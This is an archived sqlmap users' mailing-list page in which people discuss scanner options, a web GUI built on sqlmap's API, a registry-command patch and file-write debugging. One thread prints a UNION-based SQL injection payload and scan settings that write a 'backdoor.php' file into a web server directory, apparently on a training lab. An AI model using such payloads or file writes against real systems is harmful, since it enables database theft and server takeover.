sqlmap-users Mailing List for sqlmap (Page 13)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Miroslav S. <mir...@gm...> - 2015-04-20 20:26:13
|
Pushing the patch in couple of hours. Bye On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...> wrote: > Ah, good point. Hadn't thought about that. Also, requiring a POST request > does make it difficult. > > On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...> > wrote: > >> I dont think second order option will work as that is specifiing where to >> look for injection results, which might result in your underlying injection >> failing if the results are not to be found there. >> >> There is however options in latest version that appear to be for just >> this type of situation (although I personally haven't used them just yet): >> --safe-url=SAFURL URL address to visit frequently during testing >> --safe-freq=SAFREQ Test requests between two visits to a given safe >> URL >> >> I believe this will ensure your session remains active during scan. >> >> There is also the options for CSRF tokens to be snagged and parsed via: >> --csrf-token=CSR.. Parameter used to hold anti-CSRF token >> --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token >> >> In case the csrf token needs to be refreshed for each injection (when >> injecting into forms and other typical POST injections and such). >> >> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> However, that being said, I have run into this before and had to write >>> my own exploits to fully exploit the vulnerability. >>> >>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry < >>> bpe...@gm...> wrote: >>> >>>> There is a second order parameter, it could be used to perform this. It >>>> would be requested after ever injected request were sent. >>>> >>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> >>>> wrote: >>>> >>>>> Greetings, >>>>> I am testing an application which I suspect to log me out if I don't >>>>> send certain post request in certain time interval. >>>>> Is this possible to do with Sqlmap? I know that there is a parameter >>>>> which lets me to run any python code before every request. But it is >>>>> not >>>>> so nice, let's say. >>>>> Is there any possibility to supply a post request to safeurl? Is there >>>>> anything like this planed? >>>>> Thank you very much, >>>>> Vojta >>>>> >>>>> >>>>> ------------------------------------------------------------------------------ >>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT >>>>> Develop your own process in accordance with the BPMN 2 standard >>>>> Learn Process modeling best practices with Bonita BPM through live >>>>> exercises >>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- >>>>> event?utm_ >>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF >>>>> _______________________________________________ >>>>> sqlmap-users mailing list >>>>> sql...@li... >>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>> >>>> >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >>> >>> ------------------------------------------------------------------------------ >>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT >>> Develop your own process in accordance with the BPMN 2 standard >>> Learn Process modeling best practices with Bonita BPM through live >>> exercises >>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- >>> event?utm_ >>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT > Develop your own process in accordance with the BPMN 2 standard > Learn Process modeling best practices with Bonita BPM through live > exercises > http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- > event?utm_ > source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2015-04-20 18:37:59
|
Ah, good point. Hadn't thought about that. Also, requiring a POST request does make it difficult. On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...> wrote: > I dont think second order option will work as that is specifiing where to > look for injection results, which might result in your underlying injection > failing if the results are not to be found there. > > There is however options in latest version that appear to be for just this > type of situation (although I personally haven't used them just yet): > --safe-url=SAFURL URL address to visit frequently during testing > --safe-freq=SAFREQ Test requests between two visits to a given safe > URL > > I believe this will ensure your session remains active during scan. > > There is also the options for CSRF tokens to be snagged and parsed via: > --csrf-token=CSR.. Parameter used to hold anti-CSRF token > --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token > > In case the csrf token needs to be refreshed for each injection (when > injecting into forms and other typical POST injections and such). > > On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <bpe...@gm...> > wrote: > >> However, that being said, I have run into this before and had to write my >> own exploits to fully exploit the vulnerability. >> >> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <bpe...@gm... >> > wrote: >> >>> There is a second order parameter, it could be used to perform this. It >>> would be requested after ever injected request were sent. >>> >>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> >>> wrote: >>> >>>> Greetings, >>>> I am testing an application which I suspect to log me out if I don't >>>> send certain post request in certain time interval. >>>> Is this possible to do with Sqlmap? I know that there is a parameter >>>> which lets me to run any python code before every request. But it is not >>>> so nice, let's say. >>>> Is there any possibility to supply a post request to safeurl? Is there >>>> anything like this planed? >>>> Thank you very much, >>>> Vojta >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT >>>> Develop your own process in accordance with the BPMN 2 standard >>>> Learn Process modeling best practices with Bonita BPM through live >>>> exercises >>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- >>>> event?utm_ >>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT >> Develop your own process in accordance with the BPMN 2 standard >> Learn Process modeling best practices with Bonita BPM through live >> exercises >> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- >> event?utm_ >> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Johnathon D. <hoo...@gm...> - 2015-04-20 18:36:51
|
I dont think second order option will work as that is specifiing where to
look for injection results, which might result in your underlying injection
failing if the results are not to be found there.
There is however options in latest version that appear to be for just this
type of situation (although I personally haven't used them just yet):
--safe-url=SAFURL URL address to visit frequently during testing
--safe-freq=SAFREQ Test requests between two visits to a given safe URL
I believe this will ensure your session remains active during scan.
There is also the options for CSRF tokens to be snagged and parsed via:
--csrf-token=CSR.. Parameter used to hold anti-CSRF token
--csrf-url=CSRFURL URL address to visit to extract anti-CSRF token
In case the csrf token needs to be refreshed for each injection (when
injecting into forms and other typical POST injections and such).
On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <bpe...@gm...>
wrote:
> However, that being said, I have run into this before and had to write my
> own exploits to fully exploit the vulnerability.
>
> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> There is a second order parameter, it could be used to perform this. It
>> would be requested after ever injected request were sent.
>>
>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...>
>> wrote:
>>
>>> Greetings,
>>> I am testing an application which I suspect to log me out if I don't
>>> send certain post request in certain time interval.
>>> Is this possible to do with Sqlmap? I know that there is a parameter
>>> which lets me to run any python code before every request. But it is not
>>> so nice, let's say.
>>> Is there any possibility to supply a post request to safeurl? Is there
>>> anything like this planed?
>>> Thank you very much,
>>> Vojta
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>> Develop your own process in accordance with the BPMN 2 standard
>>> Learn Process modeling best practices with Bonita BPM through live
>>> exercises
>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>> event?utm_
>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live
> exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
> event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
|
|
From: Vojtěch P. <kr...@gm...> - 2015-04-20 18:34:41
|
Hi, thanks for reply, but if I understand it right, I can supply only URL to second-order parameter. But I need to send a POST request. Thank you very much, Vojta On 20.4.2015 20:22, Brandon Perry wrote: > However, that being said, I have run into this before and had to write > my own exploits to fully exploit the vulnerability. > > On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry > <bpe...@gm... <mailto:bpe...@gm...>> wrote: > > There is a second order parameter, it could be used to perform > this. It would be requested after ever injected request were sent. > > On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek > <kr...@gm... <mailto:kr...@gm...>> wrote: > > Greetings, > I am testing an application which I suspect to log me out if I > don't > send certain post request in certain time interval. > Is this possible to do with Sqlmap? I know that there is a > parameter > which lets me to run any python code before every request. But > it is not > so nice, let's say. > Is there any possibility to supply a post request to safeurl? > Is there > anything like this planed? > Thank you very much, > Vojta > > ------------------------------------------------------------------------------ > BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT > Develop your own process in accordance with the BPMN 2 standard > Learn Process modeling best practices with Bonita BPM through > live exercises > http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- > event?utm_ > source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2015-04-20 18:22:55
|
However, that being said, I have run into this before and had to write my own exploits to fully exploit the vulnerability. On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <bpe...@gm...> wrote: > There is a second order parameter, it could be used to perform this. It > would be requested after ever injected request were sent. > > On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> > wrote: > >> Greetings, >> I am testing an application which I suspect to log me out if I don't >> send certain post request in certain time interval. >> Is this possible to do with Sqlmap? I know that there is a parameter >> which lets me to run any python code before every request. But it is not >> so nice, let's say. >> Is there any possibility to supply a post request to safeurl? Is there >> anything like this planed? >> Thank you very much, >> Vojta >> >> >> ------------------------------------------------------------------------------ >> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT >> Develop your own process in accordance with the BPMN 2 standard >> Learn Process modeling best practices with Bonita BPM through live >> exercises >> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- >> event?utm_ >> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Brandon P. <bpe...@gm...> - 2015-04-20 18:21:50
|
There is a second order parameter, it could be used to perform this. It would be requested after ever injected request were sent. On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...> wrote: > Greetings, > I am testing an application which I suspect to log me out if I don't > send certain post request in certain time interval. > Is this possible to do with Sqlmap? I know that there is a parameter > which lets me to run any python code before every request. But it is not > so nice, let's say. > Is there any possibility to supply a post request to safeurl? Is there > anything like this planed? > Thank you very much, > Vojta > > > ------------------------------------------------------------------------------ > BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT > Develop your own process in accordance with the BPMN 2 standard > Learn Process modeling best practices with Bonita BPM through live > exercises > http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- > event?utm_ > source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Vojtěch P. <kr...@gm...> - 2015-04-20 18:18:15
|
Greetings, I am testing an application which I suspect to log me out if I don't send certain post request in certain time interval. Is this possible to do with Sqlmap? I know that there is a parameter which lets me to run any python code before every request. But it is not so nice, let's say. Is there any possibility to supply a post request to safeurl? Is there anything like this planed? Thank you very much, Vojta |
|
From: <na...@na...> - 2015-03-30 15:32:10
|
HELLO sqlmap team I AM NAJEEB CHOUDHARY FROM INDIA. I HAVE SOME ISSUE USING SQLMAP V1-DEV, I AM TRY TO USE WAF SCRIPT IN SQLMAP, JUST LIKE TAMPER SCRIPT. IF YOU EMAIL ME SAME EXAMPLE IT HELPFUL FOR ME. |
|
From: Miroslav S. <mir...@gm...> - 2015-03-24 13:19:40
|
Yup. Pretty sure that this doesn't require "patching" :) Bye On Tue, Mar 24, 2015 at 1:36 PM, Brandon Perry <bpe...@gm...> wrote: > Looks like someone typoed 'utf-8'... > > On Mon, Mar 23, 2015 at 9:04 PM, Connor . <col...@gm...> > wrote: > >> [21:50:23] [WARNING] unknown web page charset 'urf-8'. Please report by >> e-mail t >> o sql...@li... . >> >> >> ------------------------------------------------------------------------------ >> Dive into the World of Parallel Programming The Go Parallel Website, >> sponsored >> by Intel and developed in partnership with Slashdot Media, is your hub >> for all >> things parallel software development, from weekly thought leadership >> blogs to >> news, videos, case studies, tutorials and more. Take a look and join the >> conversation now. http://goparallel.sourceforge.net/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, > sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for > all > things parallel software development, from weekly thought leadership blogs > to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Brandon P. <bpe...@gm...> - 2015-03-24 12:37:04
|
Looks like someone typoed 'utf-8'... On Mon, Mar 23, 2015 at 9:04 PM, Connor . <col...@gm...> wrote: > [21:50:23] [WARNING] unknown web page charset 'urf-8'. Please report by > e-mail t > o sql...@li... . > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, > sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for > all > things parallel software development, from weekly thought leadership blogs > to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website |
|
From: Connor . <col...@gm...> - 2015-03-24 02:04:13
|
[21:50:23] [WARNING] unknown web page charset 'urf-8'. Please report by e-mail t o sql...@li... . |
|
From: Johnathon D. <hoo...@gm...> - 2015-03-20 13:24:14
|
Hey Guys, I got things to about as good as I am going to get them for this Web GUI front end and have made things available to public via my Github page for anyone interested, project code can be found here: https://github.com/Hood3dRob1n/SQLMAP-Web-GUI I also made a relatively simple blog posting here: http://kaoticcreations.blogspot.com/2015/03/sqlmap-web-gui.html I do call out some concerns and todo list items in the blog endings, just my notes on where I personally would like to see things head a bit as well as a small concerns of mine over use of pickling to pass options. I'm sure you will all be seeing more emails from me regarding those items in the future. If any questions, suggestions or other feedback please let me know. Thanks, HR PS - thank you very much SQLMAP development team for making this tool even possible and for the big help you provided me a few times during my development of this piece. Can't say enough nice things about you guys! |
|
From: Miroslav S. <mir...@gm...> - 2015-03-11 22:49:28
|
Thank you for report. Will try to check it tomorrow. Bye On Wed, Mar 11, 2015 at 10:54 PM, Johnathon Doe <hoo...@gm...> wrote: > Hey SQLMAP Users, > > I am working on finishing touches to Web GUI using API and lately been > working on incorporating the advanced attacks. This week I have been > focusing on the Windows Registry options (read, write, & delete). In my > testing I have noticed that all functions seem to be failing by default. > Based on the errors it appears to be lack of quoting of the full path to > the batch file being used to run reg commands. As a result it fails to ever > run the command, and thus no results return. > > My test machine is Windows 2003 Server, IIS + ASP + MS-SQL 2005. > > Now I have figured out my own workaround by patching the > ./lbi/takeover/registry.py file so that all instances of > 'self._batPathRemote' being passed to evalCmd(), delRemoteFile(), or > execCmd() are quoted when passed, like so: '"' + self._batPathRemote + '"'. > This seems to resolve the issue and allow things to work when writing to > locations with spaces in the path name. > > 1 - Is anyone else have this issue or do you guys think this is target > specific? > 2 - Not sure how I submit for a fix if this is indeed a bug > 3 - My patched registry.py: http://pastebin.com/fhVK0m6J > > Thanks, > HR > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, > sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for > all > things parallel software development, from weekly thought leadership blogs > to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Johnathon D. <hoo...@gm...> - 2015-03-11 21:54:49
|
Hey SQLMAP Users, I am working on finishing touches to Web GUI using API and lately been working on incorporating the advanced attacks. This week I have been focusing on the Windows Registry options (read, write, & delete). In my testing I have noticed that all functions seem to be failing by default. Based on the errors it appears to be lack of quoting of the full path to the batch file being used to run reg commands. As a result it fails to ever run the command, and thus no results return. My test machine is Windows 2003 Server, IIS + ASP + MS-SQL 2005. Now I have figured out my own workaround by patching the ./lbi/takeover/registry.py file so that all instances of 'self._batPathRemote' being passed to evalCmd(), delRemoteFile(), or execCmd() are quoted when passed, like so: '"' + self._batPathRemote + '"'. This seems to resolve the issue and allow things to work when writing to locations with spaces in the path name. 1 - Is anyone else have this issue or do you guys think this is target specific? 2 - Not sure how I submit for a fix if this is indeed a bug 3 - My patched registry.py: http://pastebin.com/fhVK0m6J Thanks, HR |
|
From: Brandon P. <bpe...@gm...> - 2015-03-03 02:35:12
|
I think you meant to reply to the list. Take a look at the log and data endpoints, not just the log endpoint. Might give mor information. Sent from a phone > On Mar 2, 2015, at 7:14 PM, Johnathon Doe <hoo...@gm...> wrote: > > Quick update: the Proxy logs show sqlmap doing the verification step to confirm file size after the writing, so I think the API may be off a tad bit and failing to report back status properly. > >> On Mon, Mar 2, 2015 at 7:09 PM, Johnathon Doe <hoo...@gm...> wrote: >> OK, so I tested it through Burp to see what was going on. It is indeed writing the file and working successfully, however the API itself seems to be cutting off the log data or something odd is happening that I can't figure out. >> >> It also returns no status for the file write action in the scan data response array, so I have no way to really verify if things were successful or not other than possibly writing a additional HTTP GET request from the front end to check and confirm new file exists. Seems like the API should report back status though and avoid that entirely. Any thoughts or ideas? >> >> >> Log snippet (check banner and try to write file): >> ... >> [INFO] [19:08:56] testing MySQL >> [INFO] [19:08:56] confirming MySQL >> [INFO] [19:08:56] the back-end DBMS is MySQL >> [INFO] [19:08:56] fetching banner >> [INFO] [19:08:57] fingerprinting the back-end DBMS operating system >> [INFO] [19:08:57] the back-end DBMS operating system is Linux >> [WARNING] [19:08:57] expect junk characters inside the file as a leftover from UNION query >> => just stops here, seemingly cut off... >> >> >> >> And the full scan data response array: >> Array >> ( >> [0] => Array >> ( >> [status] => 1 >> [type] => 0 >> [value] => Array >> ( >> [0] => Array >> ( >> [dbms] => MySQL >> [suffix] => >> [clause] => Array >> ( >> [0] => 1 >> [1] => 2 >> [2] => 3 >> [3] => 4 >> [4] => 5 >> ) >> >> [ptype] => 1 >> [dbms_version] => >> [prefix] => >> [place] => GET >> [os] => >> [conf] => Array >> ( >> [string] => >> [notString] => >> [titles] => >> [regexp] => >> [textOnly] => >> [optimize] => >> ) >> >> [parameter] => tainted_id >> [data] => Array >> ( >> [3] => Array >> ( >> [comment] => # >> [matchRatio] => 0.303 >> [title] => MySQL UNION query (NULL) - 1 to 10 columns >> [templatePayload] => >> [vector] => Array >> ( >> [0] => 3 >> [1] => 4 >> [2] => # >> [3] => >> [4] => >> [5] => NULL >> [6] => 1 >> [7] => >> [8] => >> ) >> >> [where] => 1 >> [payload] => tainted_id=01 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a7171,0x676a476a697a484a6442,0x716b627871)#&tainted_cost=10.00 >> ) >> >> ) >> >> ) >> >> ) >> >> ) >> >> [1] => Array >> ( >> [status] => 1 >> [type] => 2 >> [value] => 5.0.95 >> ) >> >> ) >> >> >> >> Configuration Options Set for Scan: >> Array >> ( >> [options] => Array >> ( >> [osShell] => >> [getUsers] => >> [getPasswordHashes] => >> [excludeSysDbs] => >> [uChar] => >> [regData] => >> [cpuThrottle] => 5 >> [prefix] => >> [code] => >> [googlePage] => 1 >> [skip] => >> [query] => >> [randomAgent] => true >> [osPwn] => >> [authType] => >> [crawlDepth] => >> [requestFile] => >> [predictOutput] => >> [wizard] => >> [stopFail] => >> [forms] => >> [taskid] => 5033f157cc662932 >> [pivotColumn] => >> [dropSetCookie] => >> [smart] => >> [risk] => 2 >> [sqlFile] => >> [rParam] => >> [getCurrentUser] => >> [notString] => >> [getRoles] => >> [getPrivileges] => >> [testParameter] => >> [tbl] => >> [charset] => >> [trafficFile] => >> [osSmb] => >> [level] => 3 >> [secondOrder] => >> [outputDir] => >> [timeout] => 30 >> [firstChar] => >> [torPort] => >> [regRead] => >> [binaryFields] => >> [checkTor] => >> [commonTables] => >> [direct] => >> [saFreq] => 0 >> [tmpPath] => >> [titles] => >> [getSchema] => >> [identifyWaf] => >> [paramDel] => >> [regKey] => >> [limitStart] => >> [flushSession] => >> [loadCookies] => >> [dnsName] => >> [csvDel] => , >> [method] => GET >> [osBof] => >> [invalidLogical] => >> [getCurrentDb] => >> [hexConvert] => >> [proxyFile] => >> [answers] => >> [host] => >> [dependencies] => >> [cookie] => >> [proxy] => http://127.0.0.1:8080 >> [regType] => >> [optimize] => >> [limitStop] => >> [mnemonics] => >> [uFrom] => >> [noCast] => >> [testFilter] => >> [eta] => >> [csrfToken] => >> [threads] => 1 >> [logFile] => >> [os] => >> [col] => >> [rFile] => >> [proxyCred] => >> [verbose] => 1 >> [isDba] => >> [updateAll] => >> [privEsc] => >> [forceDns] => >> [getAll] => >> [api] => 1 >> [url] => http://192.168.1.10/training/sqli/sqli1.php?tainted_id=01&tainted_cost=10.00 >> [invalidBignum] => >> [regexp] => >> [getDbs] => >> [freshQueries] => >> [uCols] => >> [smokeTest] => >> [wFile] => /tmp/backdoor.php >> [udfInject] => >> [invalidString] => >> [tor] => >> [forceSSL] => >> [ignore401] => >> [beep] => >> [saveCmdline] => >> [configFile] => >> [scope] => >> [dumpAll] => >> [torType] => HTTP >> [regVal] => >> [dummy] => >> [search] => >> [skipUrlEncode] => >> [referer] => >> [liveTest] => >> [purgeOutput] => >> [retries] => 3 >> [authPrivate] => >> [extensiveFp] => >> [dumpTable] => >> [database] => /tmp/sqlmapipc-xZHnRg >> [batch] => 1 >> [headers] => >> [authCred] => >> [osCmd] => >> [suffix] => >> [dbmsCred] => >> [regDel] => >> [shLib] => >> [sitemapUrl] => >> [timeSec] => 5 >> [msfPath] => >> [noEscape] => >> [getHostname] => >> [sessionFile] => >> [disableColoring] => 1 >> [getTables] => >> [agent] => >> [lastChar] => >> [string] => >> [dbms] => >> [dumpWhere] => >> [tamper] => >> [hpp] => >> [runCase] => >> [delay] => 0 >> [evalCode] => >> [cleanup] => >> [csrfUrl] => >> [getBanner] => true >> [profile] => >> [getComments] => >> [bulkFile] => >> [safUrl] => >> [db] => >> [excludeCol] => >> [dumpFormat] => CSV >> [alert] => >> [nullConnection] => >> [user] => >> [parseErrors] => >> [getCount] => >> [dFile] => /var/www/html/images/69.php >> [data] => >> [regAdd] => >> [ignoreProxy] => >> [getColumns] => >> [mobile] => >> [googleDork] => >> [sqlShell] => >> [pageRank] => >> [tech] => U >> [textOnly] => >> [cookieDel] => >> [commonColumns] => >> [keepAlive] => >> ) >> >> [success] => 1 >> ) >> >>> On Mon, Mar 2, 2015 at 6:32 PM, Johnathon Doe <hoo...@gm...> wrote: >>> for some reason I hadn't thought of that, that is a great idea! will report back in a bit.... >>> >>>> On Mon, Mar 2, 2015 at 6:24 PM, Brandon Perry <bpe...@gm...> wrote: >>>> Can you set the proxy argument to go through burp suite to see exactly what sqlmap is sending when those options are set? >>>> >>>> Sent from a phone >>>> >>>> > On Mar 2, 2015, at 6:21 PM, Johnathon Doe <hoo...@gm...> wrote: >>>> > >>>> > I am working on PHP front-end to leverage the REST API to drive functionality, having some issues working in a few of the advanced features - mostly file write. I was wondering if anyone could verify the wFile & dFile config options when set will trigger a file write action. >>>> > >>>> > I have managed to get the osCmd option to successfully write a file to the target, but I can't seem to get the normal --file-write --file-dest options to work. The osCmd option generally takes me passing in the prompt answers via the answer configuration option. >>>> > >>>> > I assumed if i set the values for the wFile & dFile options it would trigger the file write, but nothing seems to be happening. I dump the list of options currently configured and shows both options set with proper paths (same ones that work when provided to osCmd via answers to prompt). The logs don't show any errors and it just seems to end right where I would expect it to try the file writing. Is there a third option that needs to be set that I am perhaps missing? Any help you guys can provide is greatly appreciated! >>>> > >>>> > Also note: when i put in a bad path (just to test), it does seem to trigger the error for finding local file (wFile) so its doing something with these variables, but still seems like I'm missing something.... >>>> > >>>> > Thanks, >>>> > HR >>>> > ------------------------------------------------------------------------------ >>>> > Dive into the World of Parallel Programming The Go Parallel Website, sponsored >>>> > by Intel 